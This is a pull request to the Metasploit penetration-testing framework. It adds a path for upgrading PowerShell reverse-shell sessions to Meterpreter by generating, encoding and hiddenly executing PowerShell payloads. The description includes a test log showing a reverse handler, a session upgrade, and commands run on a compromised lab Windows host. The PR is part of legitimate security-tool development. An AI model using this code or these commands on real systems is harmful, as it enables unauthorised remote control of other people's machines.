### PR TITLE
Review 5948

### DIFF
--- a/lib/msf/base/sessions/powershell.rb
+++ b/lib/msf/base/sessions/powershell.rb
@@ -44,7 +44,7 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
   #
   # Takes over the shell_command of the parent
   #
-  def shell_command(cmd)
+  def shell_command(cmd, timeout = 1800)
     # insert random marker
     strm = Rex::Text.rand_text_alpha(15)
     endm = Rex::Text.rand_text_alpha(15)
@@ -52,7 +52,6 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
     # Send the shell channel's stdin.
     shell_write(";'#{strm}'\n" + cmd + "\n'#{endm}';\n")
 
-    timeout = 1800 # 30 minute timeout
     etime = ::Time.now.to_f + timeout
 
     buff = ""

--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -147,7 +147,6 @@ module Exploit::Powershell
   # @param ps_code [String] Powershell code
   # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
   # @param encoded [Boolean] Indicates whether ps_code is encoded or not
-  #ex
   # @return [String] Wrapped powershell code
   def run_hidden_psh(ps_code, payload_arch, encoded)
     arg_opts = {

--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -147,7 +147,7 @@ module Exploit::Powershell
   # @param ps_code [String] Powershell code
   # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
   # @param encoded [Boolean] Indicates whether ps_code is encoded or not
-  #
+  #ex
   # @return [String] Wrapped powershell code
   def run_hidden_psh(ps_code, payload_arch, encoded)
     arg_opts = {

--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -198,6 +198,13 @@ module Msf::Post::Common
       end
 
       process.close
+    when /powershell/
+      if args.nil? || args.empty?
+        o = session.shell_command("#{cmd}", time_out)
+      else
+        o = session.shell_command("#{cmd} #{args}", time_out)
+      end
+      o.chomp! if o
     when /shell/
       if args.nil? || args.empty?
         o = session.shell_command_token("#{cmd}", time_out)

--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -128,15 +128,37 @@ class Metasploit3 < Msf::Post
 
     case platform
     when 'win'
-      if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
-        vprint_status("Transfer method: Powershell")
-        psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
-        cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
-      else
-        print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
-        vprint_status("Transfer method: VBS [fallback]")
-        exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
-        aborted = transmit_payload(exe)
+      if session.type == 'powershell'
+        template_path = File.join(Msf::Config.data_directory, 'templates', 'scripts')
+        psh_payload = case datastore['Powershell::method']
+                      when 'net'
+                        Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload_data)
+                      when 'reflection'
+                        Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload_data)
+                      when 'old'
+                        Rex::Powershell::Payload.to_win32pe_psh(template_path, payload_data)
+                      when 'msil'
+                        fail RuntimeError, 'MSIL Powershell method no longer exists'
+                      else
+                        fail RuntimeError, 'No Powershell method specified'
+                      end
+
+        # prepend_sleep => 1
+        psh_payload = 'Start-Sleep -s 1;' << psh_payload
+
+        encoded_psh_payload = encode_script(psh_payload)
+        cmd_exec(run_hidden_psh(encoded_psh_payload, psh_arch, true))
+      else # shell
+        if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
+          vprint_status("Transfer method: Powershell")
+          psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
+          cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
+        else
+          print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
+          vprint_status("Transfer method: VBS [fallback]")
+          exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
+          aborted = transmit_payload(exe)
+        end
       end
     when 'python'
       vprint_status("Transfer method: Python")


### PR DESCRIPTION
Related to https://github.com/rapid7/metasploit-framework/pull/5948

Test:

```
$ ./msfconsole -qx 'use exploit/multi/handler; set payload windows/powershell_reverse_tcp; set lhost 172.16.158.1; run'
payload => windows/powershell_reverse_tcp
lhost => 172.16.158.1
[*] Started reverse SSL handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Powershell session session 1 opened (172.16.158.1:4444 -> 172.16.158.132:50923) at 2015-10-02 15:27:11 -0500

Windows PowerShell running as user Juan Vazquez on WIN-RNJ7NBRK9L7
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\Juan Vazquez\Desktop>^Z
Background session 1? [y/N]  y

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse handler on 172.16.158.1:4433
[*] Starting the payload handler...
msf exploit(handler) >
[*] Sending stage (885806 bytes) to 172.16.158.132
[*] Meterpreter session 2 opened (172.16.158.1:4433 -> 172.16.158.132:50924) at 2015-10-02 15:27:26 -0500

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getui
[-] Unknown command: getui.
meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.132 - Meterpreter session 2 closed.  Reason: User exit
```